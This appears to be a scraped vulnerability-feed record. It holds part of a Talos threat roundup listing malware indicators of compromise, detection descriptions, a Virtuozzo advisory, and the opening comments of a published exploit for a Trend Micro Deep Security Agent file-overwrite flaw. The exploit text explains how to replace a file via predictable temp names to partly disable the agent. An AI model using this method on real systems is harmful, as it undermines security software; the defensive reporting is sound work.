\nValue Name: ErrorControl ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ImagePath ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: WOW64 ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 13 \n`Global\\M98B68E3C` | 13 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`59[.]110[.]18[.]236` | 15 \n`103[.]211[.]218[.]205` | 15 \n`45[.]56[.]88[.]91` | 12 \n`51[.]254[.]137[.]156` | 8 \n`192[.]241[.]131[.]79` | 7 \n`51[.]68[.]220[.]244` | 6 \n`206[.]81[.]10[.]215` | 4 \n`217[.]149[.]241[.]121` | 3 \n`74[.]208[.]5[.]15` | 2 \n`169[.]254[.]255[.]255` | 2 \n`17[.]36[.]205[.]74` | 1 \n`173[.]194[.]204[.]109` | 1 \n`94[.]100[.]180[.]160` | 1 \n`107[.]14[.]73[.]68` | 1 \n`81[.]88[.]48[.]66` | 1 \n`184[.]106[.]54[.]11` | 1 \n`208[.]124[.]213[.]186` | 1 \n`95[.]216[.]33[.]71` | 1 \n`64[.]41[.]126[.]110` | 1 \n`64[.]98[.]36[.]173` | 1 \n`94[.]152[.]153[.]134` | 1 \n`143[.]95[.]235[.]37` | 1 \n`216[.]177[.]141[.]15` | 1 \n`52[.]96[.]38[.]82` | 1 \n`173[.]254[.]28[.]125` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`headonizm[.]in` | 15 \n`qantimagroup[.]com` | 8 \n`smtp[.]mail[.]com` | 2 \n`smtpout[.]secureserver[.]net` | 2 \n`smtp-mail[.]outlook[.]com` | 1 \n`smtp[.]mail[.]ru` | 1 \n`ssl0[.]ovh[.]net` | 1 \n`smtp[.]qiye[.]163[.]com` | 1 \n`mail1[.]hostingplatform[.]com` | 1 \n`smtp[.]corteshermanos[.]com` | 1 \n`mail[.]rekaicentres[.]com` | 1 \n`mail[.]fusat[.]cl` | 1 \n`mail[.]hces[.]net` | 1 \n`mail[.]mccmh[.]net` | 1 \n`manabi[.]ecuahosting[.]net` | 1 \n`smtp[.]cuttingedgestoneworks[.]com` | 1 \n`p52-smtp[.]mail[.]me[.]com` | 1 \n`smtp[.]siteprotect[.]com` | 1 \n`lawyers-mail[.]com` | 1 \n`mail[.]ec[.]rr[.]com` | 1 \n`just125[.]justhost[.]com` | 1 \n`mail[.]effinger-zentrum[.]ch` | 1 \n`mail[.]smscomm[.]net` | 1 \n`authsmtp[.]securemail[.]pro` | 1 \n`mail[.]lignum[.]com[.]gt` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\419.exe` | 15 \n`%ProgramData%\\Microsoft\\Crypto\\RSA\\S-1-5-18\\9bdfb692c085f99347f09462e5cd5445_9979f91c-9ae8-458a-b442-fe95beaeef26` | 2 \n`%ProgramData%\\gny7.exe` | 1 \n \n#### File Hashes\n\n` 0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab 1220dd6c5523dc0b6b6409e5b739216bc979826bcb8e43428f0889ff120fd63d 1ff11781388f142f3dd92900380de4501f12f652d20911b502dbea6d4e7c2533 2c9b1c7443421bc46987ae098dd00fa013b9722dfe6b6b518c3ab474d888d984 456f0957a36e00bf03b0e37d18e119d74b3bb08054f6248a2e7e87ddb93d7782 4bbdbcf77feea35ec8ebddead4ed7274c8404c5fe2df5d24029488424f1ce875 81fc2cb7ae6b7006b185b89427136ab8a520cbd687d0bbb5f1fc31b1a1c0f4ba 83fe7400534e8efcc5cec209b9b2835d61be0d88914bbfd6495fb675378aa2dd 8c483708b5b4230562f3d0d4dce10c6168b94ccb6e85ff5052c42513feda741e 9f48da5cd641b0bb9dffd3dec5d2442da67ed23367331eb8c181fc61ee54c41e c8078630214d7c029d23de03dedb7fab8a2f7f8df12ba99245682e3ca235179b ce11fa55f6717dadca7bdd3759b3d46217d085e78ea8bb94bb8145754741b5c5 e0ab84847c95820096ec02c1c23c15589320ddc180e6d9f0d61315409b755dc8 
e74421edc6c5a113acbd4f754d64ac9502f59cbdae14ffa129357bc5251e9afc f3de992434fc44f62318ddbe2c209a11af19205bb347dac52d7534e7f3c5579a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZZGz7Mw7Z8U/XeqUJI0xf6I/AAAAAAAAC9s/gCkvLQHcGbYVoXxZKDwD5r7a7djm_ECdQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-zTR6IMeKMG0/XeqUMrUQ9xI/AAAAAAAAC9w/x5eFuJAC-ksnhUZjpPzuyOuynw7TKP5dACLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-NaxAqYMkXLI/XeqUTyXXz6I/AAAAAAAAC94/2QIMSLmZj-8C7xCUmyUpHkVsZc-l2fQOQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-KEWZIPleWss/XeqURNjr6gI/AAAAAAAAC90/PMISEvUv2jAWPB8fjlwfqfJroX0So17ywCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7431752-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 14 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 11 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 9 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\rkyedlrg ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jcqwvdjy ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dwkqpxds ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: 
C:\\Windows\\SysWOW64\\qjxdckqf ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]110/31` | 15 \n`172[.]217[.]197[.]26/31` | 15 \n`69[.]55[.]5[.]250` | 14 \n`43[.]231[.]4[.]7` | 14 \n`64[.]233[.]186[.]26/31` | 14 \n`81[.]19[.]78[.]64/30` | 14 \n`98[.]136[.]96[.]74/31` | 14 \n`98[.]136[.]96[.]76/31` | 14 \n`85[.]114[.]134[.]88` | 14 \n`77[.]88[.]21[.]89` | 13 \n`209[.]85[.]202[.]26/31` | 13 \n`172[.]217[.]7[.]132` | 13 \n`213[.]180[.]193[.]89` | 12 \n`67[.]195[.]204[.]72/30` | 12 \n`148[.]163[.]158[.]5` | 11 \n`67[.]195[.]228[.]109` | 11 \n`67[.]195[.]228[.]94` | 10 \n`31[.]31[.]194[.]100/31` | 10 \n`98[.]136[.]96[.]92/31` | 10 \n`46[.]4[.]52[.]109` | 9 \n`67[.]195[.]204[.]79` | 9 \n`46[.]28[.]66[.]2` | 9 \n`78[.]31[.]67[.]23` | 9 \n`188[.]165[.]238[.]150` | 9 \n`93[.]179[.]69[.]109` | 9 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 14 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 14 \n`list[.]ru` | 13 \n`mx0b-001b2d01[.]pphosted[.]com` | 11 \n`mx[.]yandex[.]ru` | 9 \n`yandex[.]ru` | 9 \n`mta5[.]am0[.]yahoodns[.]net` | 9 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 9 \n`aol[.]com` | 9 \n`yahoo[.]co[.]uk` | 9 \n`irina94[.]rusgirls[.]cn` | 9 \n`anastasiasweety[.]rugirls[.]cn` | 9 \n`beautyrus[.]cn` | 9 \n`smtp[.]secureserver[.]net` | 8 \n`mxs[.]mail[.]ru` | 8 \n`mail[.]ru` | 8 \n`mx[.]yandex[.]net` | 8 \n`eur[.]olc[.]protection[.]outlook[.]com` | 8 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 8 \n`mx1[.]emailsrvr[.]com` | 8 \n`mx-apac[.]mail[.]gm0[.]yahoodns[.]net` | 7 \n`bk[.]ru` | 7 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 7 \n`inbox[.]ru` | 7 \n`smtp-in[.]orange[.]fr` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%System32%\\<random, matching 
'[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 14 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 14 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 14 \n`%TEMP%\\hjekdqa.exe` | 1 \n`%TEMP%\\yavbuhr.exe` | 1 \n \n#### File Hashes\n\n` 109ca5f094a4e98b6dac4191043bcbc4a9e849a456ca581226f42fdd7812966a 2835bade0deb4c1f1af1beff0102a7122990fd5b868f82b5f23b5ddea782d862 284d642a2ae70ba3890f39595cf215c06037f514580bcc8766b3c136cb1c4df9 2c84c7ac4fdbcaba7ac72b01a03d5ee7d62db4e4986670d17d420a45872f3158 30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2 64a3e41af01cf5443314c0d49d7a83f081c99dbadda2dfe2af5d93ff49464f4b 74ac087c43dc71971fddc1d65b4586b57d4b6ec6182914d0d176722a3a70b4bc 7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538 84c98359fa8967beb941ffa16550358d39e1fd005dccbc697267b6f170c08aeb 91637560be3528716ac0c5586b39c763c54798a0b03a55db086a3128fa665fee 973e8cb33dae5fab6505ffb140ad80587081f131bb6bb5305582e874ec8d10b0 d0ec6c954e91bde1e104cec6f316aa1d2f94389883d602790aec0128f492547c e46c3033d16ed60026ee74546aaaf17fe0e0dccfe9c40bd0b434758c01fc8a17 eab97c31815fc018ec26360c575b02ec3cf7595c1c4c6bcd121ee2123335515f eaf18fa3b771523ea252436b6dd15d1c2e0d6f93a17f5a861251dbc38f0cf951 f551911671d006e8164ba14c2024bbe55646f5e1ec6c4fb16b7f199c51be6864 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ufqU73JFz3o/XeqU7lz0kQI/AAAAAAAAC-U/jsKj0JmCJs4JClB6lqkg8u8lYarMfsM_wCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-O1eXG01gPKk/XeqU_YsqxhI/AAAAAAAAC-Y/bOHq-MRqWrkuGNfTJYNSuI_832awUB2QwCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/--DsBmJd-k1A/XeqVEntLd1I/AAAAAAAAC-c/B7JsgcpTtBsWGdOMHDsOTJc1CTyGeLMWwCLcBGAsYHQ/s1600/30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Downloader.Phorpiex-7428338-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SYSTEMRESTORE \nValue Name: DisableSR ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AutoUpdateDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 5 \n`5500330044` | 2 \n`60807405680` | 1 \n`65078708650` | 1 
\n`55970850860` | 1 \n`459500033940` | 1 \n`8855858939` | 1 \n`959505030340` | 1 \n`3949400403930` | 1 \n`974795976050` | 1 \n`56495605470` | 1 \n`8800550044` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]32[.]161[.]77` | 10 \n`94[.]156[.]133[.]65` | 6 \n`92[.]63[.]197[.]153` | 5 \n`92[.]63[.]197[.]59` | 5 \n`92[.]63[.]197[.]60` | 3 \n`95[.]81[.]1[.]43` | 3 \n`193[.]32[.]161[.]73` | 2 \n`199[.]73[.]55[.]48` | 2 \n`193[.]32[.]161[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`teubeufubg[.]su` | 7 \n`weoghehofu[.]su` | 7 \n`xiheiufisd[.]su` | 7 \n`aieieieros[.]su` | 7 \n`teoghehofu[.]su` | 7 \n`weubeufubg[.]su` | 7 \n`xeoghehofu[.]su` | 7 \n`wniaeninie[.]su` | 7 \n`tieieieros[.]su` | 7 \n`xieieieros[.]su` | 7 \n`aeoghehofu[.]su` | 7 \n`wiaeufaehe[.]su` | 7 \n`weuaueudgs[.]su` | 7 \n`wbaeubuegs[.]su` | 7 \n`wieieieros[.]su` | 7 \n`abaeubuegs[.]su` | 7 \n`tbaeubuegs[.]su` | 7 \n`aniaeninie[.]su` | 7 \n`xbaeubuegs[.]su` | 7 \n`teuaueudgs[.]su` | 7 \n`wiheiufisd[.]su` | 7 \n`xniaeninie[.]su` | 7 \n`tiheiufisd[.]su` | 7 \n`aiheiufisd[.]su` | 7 \n`aeubeufubg[.]su` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\_\\DeviceManager.exe` | 17 \n`\\.lnk` | 17 \n`E:\\.lnk` | 17 \n`E:\\_` | 17 \n`E:\\_\\DeviceManager.exe` | 17 \n`%APPDATA%\\winsvcs.txt` | 16 \n`%SystemRoot%\\2043700216632254` | 2 \n`%SystemRoot%\\2043700216632254\\winpmmt.exe` | 2 \n`%SystemRoot%\\5037867818202168\\winxvbc.exe` | 1 \n`%SystemRoot%\\1751841511079533\\winhlyh.exe` | 1 \n`%SystemRoot%\\1927513612308752\\winqfmt.exe` | 1 \n`%SystemRoot%\\7596387610791212\\winthul.exe` | 1 \n`%SystemRoot%\\19947372186510550` | 1 \n`%SystemRoot%\\19947372186510550\\wingtph.exe` | 1 \n`%SystemRoot%\\7815933519548311` | 1 \n`%SystemRoot%\\7815933519548311\\winpyzz.exe` | 1 \n`%SystemRoot%\\4232647816716713` | 1 
\n`%SystemRoot%\\4232647816716713\\winzsjy.exe` | 1 \n`%SystemRoot%\\9082268219092826` | 1 \n`%SystemRoot%\\9082268219092826\\winzpox.exe` | 1 \n`%SystemRoot%\\6188541715897433` | 1 \n`%SystemRoot%\\6188541715897433\\winngob.exe` | 1 \n`%SystemRoot%\\1917973613436861` | 1 \n`%SystemRoot%\\1917973613436861\\windcnw.exe` | 1 \n`%SystemRoot%\\4140102414092928` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 12c7c57286a5c532800495f1b9c8c5415dbaf5539aec177009845e9ac3508be3 22854dc3febbab0b72663b08bbdda7a4ee4dc501764876b2160a8d982700b4f8 22b67655c0bee80c3afb4da0811ab18da62ca2b053f958864131722708c30be1 506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf 5150389a6d1c556e7d99671f1d3fbed15e5fd5cf01f26ea9638f08708a77a36f 63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f 6dde1772c9b506f82178de0a14ad8cc7721c5f0dafb22088703b1e8dade3adc6 6f7aa9178d9cfdc6b873d54740d08f8bbb73a53f2d52453ec904d1314f5153b6 75e85527ae7786063af164c13b8c7df2f248cb4e7253d41ef444a3b84aba5219 9c88188624210f684d7aab8447c2fb50882139cca5d1bdac72838c4e76650251 af0e787fd0b006c04b60eb5d69b815d053ef774fa2d0be00a246ce4a018e85cf be5004b5f58595bfdf4cb2f317bc7dfb2d66f50f1adabb177b76fdab997a21bb c0c1e55d87fc372bba9454d65f4f99b64ee2002743f4195cba72bae642beb7f9 cbab761baf4042ba54d4471df336c65cecf253e5d2ad0a61e51199bf4355f3a5 cfc2091a57f78ac04de77c5dd72aae7be27d5633d87b0d104430f50ade7b6a73 e2ac54ca79debd49bbe0efc028d43f6793f23a903f4410003c0eba709cdff406 f0b61687dea12c0981e6226eaa6bfe3889c710b1347c6c8a89eb220bd4dc3204 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-s3KcSHDhVNk/XeqVad3POXI/AAAAAAAAC-o/-2rJP5EFDdMXr03Qde4VjROrv4XzqC3DgCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rBwtLqqTZaE/XeqVfiaPcOI/AAAAAAAAC-w/DeUNJjLMMqsoZHr1dYTIwz5Y4Xg8Cw36QCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-UT2OwCX62wM/XeqVmBgj-FI/AAAAAAAAC-0/jTbZpsoBv301wKIGtwkfr2NRnV-V41HPACLcBGAsYHQ/s1600/506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (15141) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (348) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nDealply adware detected \\- (346) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. 
It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nKovter injection detected \\- (334) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (287) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats. \nGamarue malware detected \\- (217) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (110) \nInstallcore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nSpecial Search Offer adware \\- (40) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. 
\nReverse http payload detected \\- (26) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (19) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2019-12-06T10:31:01", "published": "2019-12-06T10:31:01", "id": "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VB8_-mJ1xSE/threat-roundup-1129-1206.html", "type": "talosblog", "title": "Threat Roundup for November 29 to December 6", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-12-06T15:25:27", "bulletinFamily": "unix", "description": "This update provides a security and a stability fix.\n**Vulnerability id:** CVE-2019-15681, PSBM-99817\nlibVNCServer-0.9.10 contains a memory leak in VNC server code, which may allow an attacker to read stack memory.\n\n", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "VZA-2019-093", "href": "https://help.virtuozzo.com/s/article/VZA-2019-093", "title": "Important product security update: Virtuozzo 6.0 Update 12 Hotfix 49 (6.0.12-3754)", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2019-12-06T16:00:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33630", "href": "https://0day.today/exploit/description/33630", "title": "Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Exploit", "type": "zdt", 
"sourceData": "# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite\r\n# Exploit Author : Peter Lapp\r\n# Vendor Homepage : https://www.trendmicro.com/en_us/business.html\r\n# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716\r\n# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.\r\n# CVE: 2019-15627\r\n\r\n# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)\r\n\r\n# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )\r\n# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)\r\n# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, \r\n# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. \r\n\r\n# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.\r\n# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.\r\n# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. \r\n# So the attacker can host a \"malicious\" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, \r\n# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, \r\n# and then the lowercase payload. 
